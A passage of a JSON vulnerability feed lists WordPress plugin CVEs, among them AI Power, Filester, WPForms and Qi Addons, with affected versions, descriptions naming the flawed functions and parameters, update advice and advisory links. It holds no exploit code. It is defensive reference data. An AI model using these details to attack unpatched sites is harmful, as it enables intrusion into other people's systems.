version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3224162\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3224162\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb927aba-a96d-47b9-ba35-60945ea5cfe5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb927aba-a96d-47b9-ba35-60945ea5cfe5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0428","slug":"gpt3-ai-content-generator","versionImpact":"1.8.96","versionEndExcluding":"1.8.97","description":"The \"AI Power: Complete AI Pack\" plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 1.8.96 via deserialization of untrusted input from the $form['post_content'] variable through the wpaicg_export_prompts function. This allows authenticated attackers, with administrative privileges, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.8.97, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3224162\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3224162\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66a3abc1-0508-4ce3-952b-7dbf3738879a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66a3abc1-0508-4ce3-952b-7dbf3738879a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13361","slug":"gpt3-ai-content-generator","versionImpact":"1.8.96","versionEndExcluding":"1.8.97","description":"The AI Power: Complete AI Pack plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the wpaicg_save_image_media function in all versions up to, and including, 1.8.96. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload image files and embed shortcode attributes in the image_alt value that will execute when sending a POST request to the attachment page.","recommendation":"Update to version 1.8.97, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3224162\\\/gpt3-ai-content-generator\\\/trunk\\\/classes\\\/wpaicg_image.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3224162\\\/gpt3-ai-content-generator\\\/trunk\\\/classes\\\/wpaicg_image.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11d49c89-43be-4e12-86b5-aa7a72a89803?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11d49c89-43be-4e12-86b5-aa7a72a89803?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13360","slug":"gpt3-ai-content-generator","versionImpact":"1.8.96","versionEndExcluding":"1.8.97","description":"The AI Power: Complete AI Pack plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.8.96 via the wpaicg_troubleshoot_add_vector(). This makes it possible for authenticated attackers, with subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 1.8.97, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3224162\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3224162\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cf6cbba-0e0c-4d2c-90d0-d7e0a5222df2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cf6cbba-0e0c-4d2c-90d0-d7e0a5222df2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10392","slug":"gpt3-ai-content-generator","versionImpact":"1.8.89","versionEndExcluding":"1.8.90","description":"The AI Power: Complete AI Pack plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'handle_image_upload' function in all versions up to, and including, 1.8.89. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.8.90, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd8a45c9-ca48-4ea6-b34e-f05206f16155?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd8a45c9-ca48-4ea6-b34e-f05206f16155?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176122\\\/gpt3-ai-content-generator#file508\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176122\\\/gpt3-ai-content-generator#file508\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3234","slug":"filester","versionImpact":"1.8.8","versionEndExcluding":"1.8.9","description":"The File Manager Pro \u2013 Filester plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 1.8.8. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. Administrators have the ability to extend file manager usage privileges to lower-level users including subscribers, which would make this vulnerability more severe on such sites.","recommendation":"Update to version 1.8.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3310066%40filester%2Ftrunk&old=3294389%40filester%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3310066%40filester%2Ftrunk&old=3294389%40filester%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00df02cd-b4d3-477a-86ee-aa2f9b5216e8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00df02cd-b4d3-477a-86ee-aa2f9b5216e8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-43335","slug":"responsive-block-editor-addons","versionImpact":"1.8.8","versionEndExcluding":"1.8.9","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in CyberChimps Responsive Blocks \u2013 WordPress Gutenberg Blocks allows Stored XSS.This issue affects Responsive Blocks \u2013 WordPress Gutenberg Blocks: from n\/a through 1.8.8.","recommendation":"Update to version 1.8.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/responsive-block-editor-addons\\\/wordpress-responsive-blocks-wordpress-gutenberg-blocks-plugin-1-8-8-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/responsive-block-editor-addons\\\/wordpress-responsive-blocks-wordpress-gutenberg-blocks-plugin-1-8-8-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11453","slug":"gs-pinterest-portfolio","versionImpact":"1.8.8","versionEndExcluding":"1.8.9","description":"The WordPress Pinterest Plugin \u2013 Make a Popup, User Profile, Masonry and Gallery Layout plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gs_pin_widget' shortcode in all versions up to, and including, 1.8.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.8.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-pinterest-portfolio\\\/tags\\\/1.8.8\\\/includes\\\/shortcode.php#L202\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-pinterest-portfolio\\\/tags\\\/1.8.8\\\/includes\\\/shortcode.php#L202\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200115\\\/gs-pinterest-portfolio\\\/trunk\\\/includes\\\/shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200115\\\/gs-pinterest-portfolio\\\/trunk\\\/includes\\\/shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/425cd0be-d17e-4c2b-bf29-3b850905a88e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/425cd0be-d17e-4c2b-bf29-3b850905a88e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1911","slug":"blocksy-companion","versionEndExcluding":"1.8.82","description":"The Blocksy Companion WordPress plugin before 1.8.82 does not ensure that posts to be accessed via a shortcode are already public and can be viewed, allowing any authenticated users, such as subscriber to access draft posts for example","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e7c52af0-b210-4e7d-a5e0-ee0645ddc08c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e7c52af0-b210-4e7d-a5e0-ee0645ddc08c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3649","slug":"wpforms-lite","versionImpact":"1.8.7.2","versionEndExcluding":"1.8.8.2","description":"The Contact Form by WPForms \u2013 Drag & Drop Form Builder for WordPress plugin for WordPress is vulnerable to price manipulation in versions up to, and including, 1.8.7.2. This is due to a lack of controls on several product parameters. This makes it possible for unauthenticated attackers to manipulate prices, product information, and quantities for purchases made via the Stripe payment integration.","recommendation":"Update to version 1.8.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68a509ae-9943-4b9a-8ede-2b5732e96e6d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68a509ae-9943-4b9a-8ede-2b5732e96e6d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3075634\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3075634\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3075634\\\/wpforms-lite\\\/trunk\\\/assets\\\/js\\\/integrations\\\/stripe\\\/wpforms-stripe-payment-element.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3075634\\\/wpforms-lite\\\/trunk\\\/assets\\\/js\\\/integrations\\\/stripe\\\/wpforms-stripe-payment-element.js\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8426","slug":"pagelayer","versionImpact":"1.8.7","versionEndExcluding":"1.8.8","description":"The Page Builder: Pagelayer  WordPress plugin before 1.8.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 1.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f81b7478-c775-45ff-bbb8-d13c3f58acc6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f81b7478-c775-45ff-bbb8-d13c3f58acc6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7501","slug":"download-plugins-dashboard","versionImpact":"1.8.7","versionEndExcluding":"1.8.8","description":"The Download Plugins and Themes in ZIP from Dashboard plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.8.7. This is due to missing or incorrect nonce validation on the download_theme() function. This makes it possible for unauthenticated attackers to download arbitrary themes from the website via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. In versions prior to 1.8.6 it was possible to download the entire sites files.","recommendation":"Update to version 1.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dcbfcaeb-2635-4b11-b426-ee04345d5f36?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dcbfcaeb-2635-4b11-b426-ee04345d5f36?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136231\\\/download-plugins-dashboard\\\/tags\\\/1.8.8\\\/includes\\\/class-alg-download-plugins-core.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136231\\\/download-plugins-dashboard\\\/tags\\\/1.8.8\\\/includes\\\/class-alg-download-plugins-core.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13699","slug":"qi-addons-for-elementor","versionImpact":"1.8.7","versionEndExcluding":"1.8.8","description":"The Qi Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018cursor\u2019 parameter in all versions up to, and including, 1.8.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability was partially patched in versions 1.8.5, 1.8.6, and 1.8.7.","recommendation":"Update to version 1.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qi-addons-for-elementor\\\/trunk\\\/inc\\\/shortcodes\\\/typeout-text\\\/class-qiaddonsforelementor-typeout-text-shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qi-addons-for-elementor\\\/trunk\\\/inc\\\/shortcodes\\\/typeout-text\\\/class-qiaddonsforelementor-typeout-text-shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230342\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230342\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231980\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231980\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3232550\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3232550\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234136\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234136\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/add39d28-4070-44e2-8dff-0371e0c58453?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/add39d28-4070-44e2-8dff-0371e0c58453?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6742","slug":"envira-gallery-lite","versionImpact":"1.8.7.2","versionEndExcluding":"1.8.7.3","description":"The Gallery Plugin for WordPress \u2013 Envira Photo Gallery plugin for WordPress is vulnerable to unauthorized modification of data due to an improper capability check on the 'envira_gallery_insert_images' function in all versions up to, and including, 1.8.7.1. This makes it possible for authenticated attackers, with contributor access and above, to modify galleries on other users' posts.","recommendation":"Update to version 1.8.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40655278-6915-4a76-ac2d-bb161d3cee92?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40655278-6915-4a76-ac2d-bb161d3cee92?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envira-gallery-lite\\\/trunk\\\/includes\\\/admin\\\/ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envira-gallery-lite\\\/trunk\\\/includes\\\/admin\\\/ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3017115\\\/envira-gallery-lite\\\/tags\\\/1.8.7.3\\\/includes\\\/admin\\\/ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3017115\\\/envira-gallery-lite\\\/tags\\\/1.8.7.3\\\/includes\\\/admin\\\/ajax.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12331","slug":"filester","versionImpact":"1.8.6","versionEndExcluding":"1.8.7","description":"The File Manager Pro \u2013 Filester plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ajax_install_plugin' function in all versions up to, and including, 1.8.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install the Filebird plugin.","recommendation":"Update to version 1.8.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208858\\\/filester\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208858\\\/filester\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b09bfff-4d6e-4de0-b6ab-6ac27c4f2be6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b09bfff-4d6e-4de0-b6ab-6ac27c4f2be6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3435","slug":"mangboard","versionImpact":"1.8.6","versionEndExcluding":"1.8.7","description":"The Mang Board WP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the board_header and board_footer parameters in all versions up to, and including, 1.8.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 1.8.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3272163\\\/mangboard\\\/trunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3272163\\\/mangboard\\\/trunk\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b97a2f7-b730-4fb7-a41e-dd37f5f87f27?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b97a2f7-b730-4fb7-a41e-dd37f5f87f27?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5275","slug":"charitable","versionImpact":"1.8.6.1","versionEndExcluding":"1.8.6.2","description":"The Charitable \u2013 Donation Plugin for WordPress \u2013 Fundraising with Recurring Donations & More plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the privacy settings fields in all versions up to, and including, 1.8.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.\r\nThis issue was partially fixed in version 1.8.6.1 and fully fixed in version 1.8.6.2.","recommendation":"Update to version 1.8.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/charitable\\\/tags\\\/1.8.5.3\\\/templates\\\/form-fields\\\/checkbox.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/charitable\\\/tags\\\/1.8.5.3\\\/templates\\\/form-fields\\\/checkbox.php#L40\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/453d8918-32dc-43d6-8969-71f719536891?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/453d8918-32dc-43d6-8969-71f719536891?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13568","slug":"fluent-support","versionImpact":"1.8.5","versionEndExcluding":"1.8.6","description":"The Fluent Support \u2013 Helpdesk & Customer Support Ticket System plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.8.5 via the 'fluent-support' directory. This makes it possible for unauthenticated attackers to extract sensitive data stored insecurely in the \/wp-content\/uploads\/fluent-support directory which can contain file attachments included in support tickets.","recommendation":"Update to version 1.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluent-support\\\/trunk\\\/app\\\/Services\\\/Includes\\\/FileSystem.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluent-support\\\/trunk\\\/app\\\/Services\\\/Includes\\\/FileSystem.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17f40832-8ae5-443a-aa98-f0e61d1152cc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17f40832-8ae5-443a-aa98-f0e61d1152cc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4626","slug":"password-protect-page","versionEndExcluding":"1.8.6","description":"The PPWP WordPress plugin before 1.8.6 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/59c577e9-7d1c-46bc-9218-3e143068738d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/59c577e9-7d1c-46bc-9218-3e143068738d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9669","slug":"filester","versionImpact":"1.8.5","versionEndExcluding":"1.8.6","description":"The File Manager Pro \u2013 Filester plugin for WordPress is vulnerable to Local JavaScript File Inclusion in all versions up to, and including, 1.8.5 via the 'fm_locale' parameter. This makes it possible for authenticated attackers, with Administrator-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included. The vulnerability was partially patched in version 1.8.5.","recommendation":"Update to version 1.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/filester\\\/trunk\\\/includes\\\/File_manager\\\/FileManager.php#L250\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/filester\\\/trunk\\\/includes\\\/File_manager\\\/FileManager.php#L250\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/filester\\\/trunk\\\/views\\\/pages\\\/html-filemanager.php#L3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/filester\\\/trunk\\\/views\\\/pages\\\/html-filemanager.php#L3\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186518\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186518\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3196150\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3196150\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d947023-60d3-4bd8-b45d-e1663326d6c1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d947023-60d3-4bd8-b45d-e1663326d6c1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-24916","slug":"UNKNOWN-CVE-2021-24916-1","versionEndExcluding":"1.8.6","description":"The Qubely WordPress plugin before 1.8.6 allows unauthenticated user to send arbitrary e-mails to arbitrary addresses via the qubely_send_form_data AJAX action.","recommendation":"Update to version 1.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/93b893be-59ad-4500-8edb-9fa7a45304d5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/93b893be-59ad-4500-8edb-9fa7a45304d5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6496","slug":"manage-notification-emails","versionImpact":"1.8.5","versionEndExcluding":"1.8.6","description":"The Manage Notification E-mails plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.8.5 via the card_famne_export_settings function. This makes it possible for unauthenticated attackers to obtain plugin settings.","recommendation":"Update to version 1.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/048bc117-88df-44b3-a30c-692bad23050f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/048bc117-88df-44b3-a30c-692bad23050f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3007199%40manage-notification-emails%2Ftrunk&old=2920034%40manage-notification-emails%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3007199%40manage-notification-emails%2Ftrunk&old=2920034%40manage-notification-emails%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7030","slug":"jquery-collapse-o-matic","versionImpact":"1.8.5.5","versionEndExcluding":"1.8.5.6","description":"The Collapse-O-Matic plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'expand' shortcode in all versions up to, and including, 1.8.5.5 due to insufficient input sanitization and output escaping on the 'tag' user supplied attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.8.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea23bcc2-ce71-4f16-85f3-11276deb659f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea23bcc2-ce71-4f16-85f3-11276deb659f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3074011%40jquery-collapse-o-matic&new=3074011%40jquery-collapse-o-matic&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3074011%40jquery-collapse-o-matic&new=3074011%40jquery-collapse-o-matic&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7063","slug":"wpforms","versionImpact":"1.8.5.3","versionEndExcluding":"1.8.5.4","description":"The WPForms Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via form submission parameters in all versions up to, and including, 1.8.5.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.8.5.4, or a newer patched 